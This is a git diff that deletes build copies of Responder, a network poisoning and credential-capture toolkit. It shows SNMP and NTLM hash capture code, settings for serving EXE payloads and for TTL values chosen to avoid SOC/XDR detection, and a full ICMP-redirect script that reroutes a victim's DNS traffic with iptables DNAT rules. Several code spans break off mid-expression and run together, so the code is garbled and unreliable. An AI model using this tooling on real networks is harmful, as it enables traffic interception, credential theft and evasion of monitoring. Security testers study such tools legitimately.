"{}:{}:{}:{}".format(snmp_user, full_snmp_msg, engine_id, auth_params) - }) - else: - community_string = str(received_record['field-1']) - snmp_version = '1' if snmp_version == 0 else '2c' - - SaveToDb( - { - "module": "SNMP", - "type": "Cleartext SNMPv{}".format(snmp_version), - "client": self.client_address[0], - "user": community_string, - "cleartext": community_string, - "fullhash": community_string, - } - ) diff --git a/build/lib/Responder/servers/WinRM.py b/build/lib/Responder/servers/WinRM.py deleted file mode 100644 index b0df5e4..0000000 --- a/build/lib/Responder/servers/WinRM.py +++ /dev/null @@ -1,184 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import struct -import codecs -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler, StreamRequestHandler -else: - from SocketServer import BaseRequestHandler, StreamRequestHandler -from base64 import b64decode, b64encode -from Responder.packets import NTLM_Challenge -from Responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans -from Responder.packets import WPADScript, ServeExeFile, ServeHtmlFile - - -# Parse NTLMv1/v2 hash. -def ParseHTTPHash(data, Challenge, client, module): - LMhashLen = struct.unpack(' 24: - NthashLen = 64 - DomainLen = struct.unpack('. -import sys, random -import Responder.utils as utils -if (sys.version_info > (3, 0)): - import configparser as ConfigParser -else: - import ConfigParser -import subprocess - -from Responder.utils import * - -__version__ = 'Responder 3.1.4.0' - -class Settings: - - def __init__(self): - self.ResponderPATH = os.path.dirname(__file__) - self.Bind_To = '0.0.0.0' - - def __str__(self): - ret = 'Settings class:\n' - for attr in dir(self): - value = str(getattr(self, attr)).strip() - ret += " Settings.%s = %s\n" % (attr, value) - return ret - - def toBool(self, str): - return str.upper() == 'ON' - - def ExpandIPRanges(self): - def expand_ranges(lst): - ret = [] - for l in lst: - if ':' in l: #For IPv6 addresses, similar to the IPv4 version below but hex and pads :'s to expand shortend addresses - while l.count(':') < 7: - pos = l.find('::') - l = l[:pos] + ':' + l[pos:] - tab = l.split(':') - x = {} - i = 0 - xaddr = '' - for byte in tab: - if byte == '': - byte = '0' - if '-' not in byte: - x[i] = x[i+1] = int(byte, base=16) - else: - b = byte.split('-') - x[i] = int(b[0], base=16) - x[i+1] = int(b[1], base=16) - i += 2 - for a in range(x[0], x[1]+1): - for b in range(x[2], x[3]+1): - for c in range(x[4], x[5]+1): - for d in range(x[6], x[7]+1): - for e in range(x[8], x[9]+1): - for f in range(x[10], x[11]+1): - for g in range(x[12], x[13]+1): - for h in range(x[14], x[15]+1): - xaddr = ('%x:%x:%x:%x:%x:%x:%x:%x' % (a, b, c, d, e, f, g, h)) - xaddr = re.sub('(^|:)0{1,4}', ':', xaddr, count = 7)#Compresses expanded IPv6 address - xaddr = re.sub(':{3,7}', '::', xaddr, count = 7) - ret.append(xaddr) - else: - tab = l.split('.') - x = {} - i = 0 - for byte in tab: - if '-' not in byte: - x[i] = x[i+1] = int(byte) - else: - b = byte.split('-') - x[i] = int(b[0]) - x[i+1] = int(b[1]) - i += 2 - for a in range(x[0], x[1]+1): - for b in range(x[2], x[3]+1): - for c in range(x[4], x[5]+1): - for d in range(x[6], x[7]+1): - ret.append('%d.%d.%d.%d' % (a, b, c, d)) - return ret - - self.RespondTo = expand_ranges(self.RespondTo) - self.DontRespondTo = expand_ranges(self.DontRespondTo) - - def populate(self, options): - - if options.Interface == None and utils.IsOsX() == False: - print(utils.color("Error: -I mandatory option is missing", 1)) - sys.exit(-1) - - if options.Interface == "ALL" and options.OURIP == None: - print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1)) - sys.exit(-1) - #Python version - if (sys.version_info > (3, 0)): - self.PY2OR3 = "PY3" - else: - self.PY2OR3 = "PY2" - # Config parsing - config = ConfigParser.ConfigParser() - config.read(os.path.join(self.ResponderPATH, 'Responder.conf')) - - # Poisoners - self.LLMNR_On_Off = self.toBool(config.get('Responder Core', 'LLMNR')) - self.NBTNS_On_Off = self.toBool(config.get('Responder Core', 'NBTNS')) - self.MDNS_On_Off = self.toBool(config.get('Responder Core', 'MDNS')) - - # Servers - self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP')) - self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS')) - self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB')) - self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL')) - self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP')) - self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP')) - self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP')) - self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP')) - self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP')) - self.MQTT_On_Off = self.toBool(config.get('Responder Core', 'MQTT')) - self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS')) - self.RDP_On_Off = self.toBool(config.get('Responder Core', 'RDP')) - self.DCERPC_On_Off = self.toBool(config.get('Responder Core', 'DCERPC')) - self.WinRM_On_Off = self.toBool(config.get('Responder Core', 'WINRM')) - self.Krb_On_Off = self.toBool(config.get('Responder Core', 'Kerberos')) - self.SNMP_On_Off = self.toBool(config.get('Responder Core', 'SNMP')) - - # Db File - self.DatabaseFile = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database')) - - # Log Files - self.LogDir = os.path.join(self.ResponderPATH, 'logs') - - if not os.path.exists(self.LogDir): - os.mkdir(self.LogDir) - - self.SessionLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'SessionLog')) - self.PoisonersLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'PoisonersLog')) - self.AnalyzeLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog')) - self.ResponderConfigDump = os.path.join(self.LogDir, config.get('Responder Core', 'ResponderConfigDump')) - - # CLI options - self.ExternalIP = options.ExternalIP - self.LM_On_Off = options.LM_On_Off - self.NOESS_On_Off = options.NOESS_On_Off - self.WPAD_On_Off = options.WPAD_On_Off - self.DHCP_On_Off = options.DHCP_On_Off - self.Basic = options.Basic - self.Interface = options.Interface - self.OURIP = options.OURIP - self.Force_WPAD_Auth = options.Force_WPAD_Auth - self.Upstream_Proxy = options.Upstream_Proxy - self.AnalyzeMode = options.Analyze - self.Verbose = options.Verbose - self.ProxyAuth_On_Off = options.ProxyAuth_On_Off - self.CommandLine = str(sys.argv) - self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) - self.Bind_To6 = utils.FindLocalIP6(self.Interface, self.OURIP) - self.DHCP_DNS = options.DHCP_DNS - self.ExternalIP6 = options.ExternalIP6 - self.Quiet_Mode = options.Quiet - - # TTL blacklist. Known to be detected by SOC / XDR - TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"] - # Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py) - if options.TTL is None: - self.TTL = None - - # Random TTL - elif options.TTL.upper() == "RANDOM": - TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x')) - if TTL in TTL_blacklist: - TTL = int.from_bytes(TTL, "big")+1 - TTL = int.to_bytes(TTL, 4) - self.TTL = TTL.decode('utf-8') - else: - self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8') - - #Do we have IPv6 for real? - self.IPv6 = utils.Probe_IPv6_socket() - - if self.Interface == "ALL": - self.Bind_To_ALL = True - else: - self.Bind_To_ALL = False - #IPV4 - if self.Interface == "ALL": - self.IP_aton = socket.inet_aton(self.OURIP) - else: - self.IP_aton = socket.inet_aton(self.Bind_To) - #IPV6 - if self.Interface == "ALL": - if self.OURIP != None and utils.IsIPv6IP(self.OURIP): - self.IP_Pton6 = socket.inet_pton(socket.AF_INET6, self.OURIP) - else: - self.IP_Pton6 = socket.inet_pton(socket.AF_INET6, self.Bind_To6) - - #External IP - if self.ExternalIP: - if utils.IsIPv6IP(self.ExternalIP): - sys.exit(utils.color('[!] IPv6 address provided with -e parameter. Use -6 IPv6_address instead.', 1)) - - self.ExternalIPAton = socket.inet_aton(self.ExternalIP) - self.ExternalResponderIP = utils.RespondWithIP() - else: - self.ExternalResponderIP = self.Bind_To - - #External IPv6 - if self.ExternalIP6: - self.ExternalIP6Pton = socket.inet_pton(socket.AF_INET6, self.ExternalIP6) - self.ExternalResponderIP6 = utils.RespondWithIP6() - else: - self.ExternalResponderIP6 = self.Bind_To6 - - self.Os_version = sys.platform - - self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt') - self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt') - self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt') - self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt') - self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt') - self.MQTTLog = os.path.join(self.LogDir, 'MQTT-Clear-Text-Password-%s.txt') - self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt') - self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt') - self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt') - self.SNMPLog = os.path.join(self.LogDir, 'SNMP-Clear-Text-Password-%s.txt') - - self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt') - self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt') - self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt') - self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt') - self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt') - self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt') - self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt') - self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt') - self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt') - self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt') - - # HTTP Options - self.Serve_Exe = self.toBool(config.get('HTTP Server', 'Serve-Exe')) - self.Serve_Always = self.toBool(config.get('HTTP Server', 'Serve-Always')) - self.Serve_Html = self.toBool(config.get('HTTP Server', 'Serve-Html')) - self.Html_Filename = config.get('HTTP Server', 'HtmlFilename') - self.Exe_Filename = config.get('HTTP Server', 'ExeFilename') - self.Exe_DlName = config.get('HTTP Server', 'ExeDownloadName') - self.WPAD_Script = config.get('HTTP Server', 'WPADScript') - self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject') - - if len(self.HtmlToInject) == 0: - self.HtmlToInject = ""# Let users set it up themself in Responder.conf. "Loading" - - if len(self.WPAD_Script) == 0: - if self.WPAD_On_Off: - self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}' - - if self.ProxyAuth_On_Off: - self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}' - - if self.Serve_Exe == True: - if not os.path.exists(self.Html_Filename): - print(utils.color("/!\\ Warning: %s: file not found" % self.Html_Filename, 3, 1)) - - if not os.path.exists(self.Exe_Filename): - print(utils.color("/!\\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)) - - # SSL Options - self.SSLKey = config.get('HTTPS Server', 'SSLKey') - self.SSLCert = config.get('HTTPS Server', 'SSLCert') - - # Respond to hosts - self.RespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])) - self.RespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])) - self.DontRespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])) - self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])) - #add a .local to all provided DontRespondToName - self.MDNSTLD = ['.LOCAL'] - self.DontRespondToName = [x+y for x in self.DontRespondToName_ for y in ['']+self.MDNSTLD] - #Generate Random stuff for one Responder session - self.MachineName = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)]) - self.Username = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)]) - self.Domain = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)]) - self.DHCPHostname = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) - self.DomainName = self.Domain + '.LOCAL' - self.MachineNego = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName - self.RPCPort = random.randrange(45000, 49999) - # Auto Ignore List - self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess')) - self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials')) - self.CaptureMultipleHashFromSameHost = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost')) - self.AutoIgnoreList = [] - - # Set up Challenge - self.NumChal = config.get('Responder Core', 'Challenge') - if self.NumChal.lower() == 'random': - self.NumChal = "random" - - if len(self.NumChal) != 16 and self.NumChal != "random": - print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)) - sys.exit(-1) - - self.Challenge = b'' - if self.NumChal.lower() == 'random': - pass - else: - if self.PY2OR3 == 'PY2': - for i in range(0, len(self.NumChal),2): - self.Challenge += self.NumChal[i:i+2].decode("hex") - else: - self.Challenge = bytes.fromhex(self.NumChal) - - - # Set up logging - logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') - logging.warning('Responder Started: %s' % self.CommandLine) - - Formatter = logging.Formatter('%(asctime)s - %(message)s') - PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w') - ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a') - PLog_Handler.setLevel(logging.INFO) - ALog_Handler.setLevel(logging.INFO) - PLog_Handler.setFormatter(Formatter) - ALog_Handler.setFormatter(Formatter) - - self.PoisonersLogger = logging.getLogger('Poisoners Log') - self.PoisonersLogger.addHandler(PLog_Handler) - - self.AnalyzeLogger = logging.getLogger('Analyze Log') - self.AnalyzeLogger.addHandler(ALog_Handler) - - # First time Responder run? - if os.path.isfile(self.ResponderPATH+'/Responder.db'): - pass - else: - #If it's the first time, generate SSL certs for this Responder session and send openssl output to /dev/null - # Certs = os.system(self.ResponderPATH+"/certs/gen-self-signed-cert.sh >/dev/null 2>&1") - print(self.ResponderPATH + '/certs') - Certs = os.system(f"{self.ResponderPATH}/certs/gen-self-signed-cert.sh {self.ResponderPATH} >/dev/null 2>&1") - - try: - NetworkCard = subprocess.check_output(["ifconfig", "-a"]) - except: - try: - NetworkCard = subprocess.check_output(["ip", "address", "show"]) - except subprocess.CalledProcessError as ex: - NetworkCard = "Error fetching Network Interfaces:", ex - pass - try: - p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT) - DNS = p.stdout.read() - except: - p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) - DNS = p.stdout.read() - - try: - RoutingInfo = subprocess.check_output(["netstat", "-rn"]) - except: - try: - RoutingInfo = subprocess.check_output(["ip", "route", "show"]) - except subprocess.CalledProcessError as ex: - RoutingInfo = "Error fetching Routing information:", ex - pass - - Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1')) - try: - utils.DumpConfig(self.ResponderConfigDump, Message) - #utils.DumpConfig(self.ResponderConfigDump,str(self)) - except AttributeError as ex: - print("Missing Module:", ex) - pass - -def init(): - global Config - Config = Settings() diff --git a/build/lib/Responder/tools/BrowserListener.py b/build/lib/Responder/tools/BrowserListener.py deleted file mode 100644 index 3a29aad..0000000 --- a/build/lib/Responder/tools/BrowserListener.py +++ /dev/null @@ -1,118 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sys -import os -import _thread - -BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..')) -sys.path.insert(0, BASEDIR) - -from Responder.servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger -from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler -from threading import Lock -from Responder.utils import * - -def ParseRoles(data): - if len(data) != 4: - return '' - - AllRoles = { - 'Workstation': (ord(data[0]) >> 0) & 1, - 'Server': (ord(data[0]) >> 1) & 1, - 'SQL': (ord(data[0]) >> 2) & 1, - 'Domain Controller': (ord(data[0]) >> 3) & 1, - 'Backup Controller': (ord(data[0]) >> 4) & 1, - 'Time Source': (ord(data[0]) >> 5) & 1, - 'Apple': (ord(data[0]) >> 6) & 1, - 'Novell': (ord(data[0]) >> 7) & 1, - 'Member': (ord(data[1]) >> 0) & 1, - 'Print': (ord(data[1]) >> 1) & 1, - 'Dialin': (ord(data[1]) >> 2) & 1, - 'Xenix': (ord(data[1]) >> 3) & 1, - 'NT Workstation': (ord(data[1]) >> 4) & 1, - 'WfW': (ord(data[1]) >> 5) & 1, - 'Unused': (ord(data[1]) >> 6) & 1, - 'NT Server': (ord(data[1]) >> 7) & 1, - 'Potential Browser': (ord(data[2]) >> 0) & 1, - 'Backup Browser': (ord(data[2]) >> 1) & 1, - 'Master Browser': (ord(data[2]) >> 2) & 1, - 'Domain Master Browser': (ord(data[2]) >> 3) & 1, - 'OSF': (ord(data[2]) >> 4) & 1, - 'VMS': (ord(data[2]) >> 5) & 1, - 'Windows 95+': (ord(data[2]) >> 6) & 1, - 'DFS': (ord(data[2]) >> 7) & 1, - 'Local': (ord(data[3]) >> 6) & 1, - 'Domain Enum': (ord(data[3]) >> 7) & 1, - } - - return ', '.join(k for k,v in list(AllRoles.items()) if v == 1) - - -class BrowserListener(BaseRequestHandler): - def handle(self): - data, socket = self.request - - lock = Lock() - lock.acquire() - - DataOffset = struct.unpack('L'), - ('Reserved', '. -from socket import * - -print('MSSQL Server Finder 0.3') - -s = socket(AF_INET,SOCK_DGRAM) -s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) -s.settimeout(5) -s.sendto(b'\x02',('255.255.255.255',1434)) - -try: - while 1: - data, address = s.recvfrom(8092) - if not data: - break - else: - print("===============================================================") - print(("Host details: %s"%(address[0]))) - print((data[2:]).decode('latin-1')) - print("===============================================================") - print("") -except: - pass diff --git a/build/lib/Responder/tools/Icmp-Redirect.py b/build/lib/Responder/tools/Icmp-Redirect.py deleted file mode 100755 index 098f243..0000000 --- a/build/lib/Responder/tools/Icmp-Redirect.py +++ /dev/null @@ -1,279 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import socket -import struct -import optparse -import pipes -import sys -import codecs -from socket import * -sys.path.append('../') -from Responder.odict import OrderedDict -from random import randrange -from time import sleep -from subprocess import call - -if (sys.version_info < (3, 0)): - sys.exit('This script is meant to be run with Python3') -parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1', - prog=sys.argv[0], - ) -parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP") -parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr") -parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP") -parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost") -parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2") -parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface") -parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr") -options, args = parser.parse_args() - -if options.OURIP is None: - print("-i mandatory option is missing.\n") - parser.print_help() - exit(-1) -elif options.OriginalGwAddr is None: - print("-g mandatory option is missing, please provide the original gateway address.\n") - parser.print_help() - exit(-1) -elif options.VictimIP is None: - print("-t mandatory option is missing, please provide a target.\n") - parser.print_help() - exit(-1) -elif options.Interface is None: - print("-I mandatory option is missing, please provide your network interface.\n") - parser.print_help() - exit(-1) -elif options.ToThisHost is None: - print("-r mandatory option is missing, please provide a destination target.\n") - parser.print_help() - exit(-1) - -if options.AlternateGwAddr is None: - AlternateGwAddr = options.OURIP - -#Setting some vars. -OURIP = options.OURIP -OriginalGwAddr = options.OriginalGwAddr -AlternateGwAddr = options.AlternateGwAddr -VictimIP = options.VictimIP -ToThisHost = options.ToThisHost -ToThisHost2 = options.ToThisHost2 -Interface = options.Interface - -def Show_Help(ExtraHelpData): - print("\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to laurent.gaffie@gmail.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n") - print(ExtraHelpData) - -MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP) - -#Python version -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -def GenCheckSum(data): - s = 0 - for i in range(0, len(data), 2): - q = ord(data[i]) + (ord(data[i+1]) << 8) - f = s + q - s = (f & 0xffff) + (f >> 16) - return StructWithLenPython2or3("H", len(CalculateLen)) - # Then CheckSum this packet - CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"]) - self.fields["CheckSum"] = GenCheckSum(CheckSumCalc) - -class ICMPRedir(Packet): - fields = OrderedDict([ - ("Type", "\x05"), - ("OpCode", "\x01"), - ("CheckSum", "\x00\x00"), - ("GwAddr", ""), - ("Data", ""), - ]) - - def calculate(self): - self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1') - CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"]) - self.fields["CheckSum"] = GenCheckSum(CheckSumCalc) - -class DummyUDP(Packet): - fields = OrderedDict([ - ("SrcPort", "\x00\x35"), #port 53 - ("DstPort", "\x00\x35"), - ("Len", "\x00\x08"), #Always 8 in this case. - ("CheckSum", "\x00\x00"), #CheckSum disabled. - ]) - -def ReceiveArpFrame(DstAddr): - s = socket(AF_PACKET, SOCK_RAW) - s.settimeout(5) - Protocol = 0x0806 - s.bind((Interface, Protocol)) - OurMac = s.getsockname()[4].decode('latin-1') - Eth = EthARP(SrcMac=OurMac) - Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac) - Arp.calculate() - final = str(Eth)+str(Arp) - try: - s.send(NetworkSendBufferPython2or3(final)) - data = s.recv(1024) - DstMac = data[22:28] - DestMac = codecs.encode(DstMac, 'hex') - PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)]) - return PrintMac,DstMac.decode('latin-1') - except: - print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)) - exit(1) - -def IcmpRedirectSock(DestinationIP): - PrintMac,DestMac = ReceiveArpFrame(VictimIP) - print('[ARP]Target Mac address is :',PrintMac) - PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr) - print('[ARP]Router Mac address is :',PrintMac) - s = socket(AF_PACKET, SOCK_RAW) - Protocol = 0x0800 - s.bind((Interface, Protocol)) - Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac) - IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP())) - IPPackUDP.calculate() - ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP)) - ICMPPack.calculate() - IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack)) - IPPack.calculate() - final = str(Eth)+str(IPPack) - s.send(NetworkSendBufferPython2or3(final)) - print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)) - -def FindWhatToDo(ToThisHost2): - if ToThisHost2 != None: - Show_Help('Hit CTRL-C to kill this script') - RunThisInLoop(ToThisHost, ToThisHost2,OURIP) - if ToThisHost2 == None: - Show_Help(MoreHelp) - IcmpRedirectSock(DestinationIP=ToThisHost) - exit() - -def RunThisInLoop(host, host2, ip): - dns1 = pipes.quote(host) - dns2 = pipes.quote(host2) - ouripadd = pipes.quote(ip) - call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True) - call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True) - print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.") - while True: - IcmpRedirectSock(DestinationIP=dns1) - IcmpRedirectSock(DestinationIP=dns2) - print("[+]Repoisoning the target in 8 minutes...") - sleep(480) - -FindWhatToDo(ToThisHost2) diff --git a/build/lib/Responder/tools/MultiRelay.py b/build/lib/Responder/tools/MultiRelay.py deleted file mode 100644 index cabbf17..0000000 --- a/build/lib/Responder/tools/MultiRelay.py +++ /dev/null @@ -1,853 +0,0 @@ -#!/usr/bin/env python -# -*- coding: latin-1 -*- -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sys -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...") -import re -import os -import logging -import 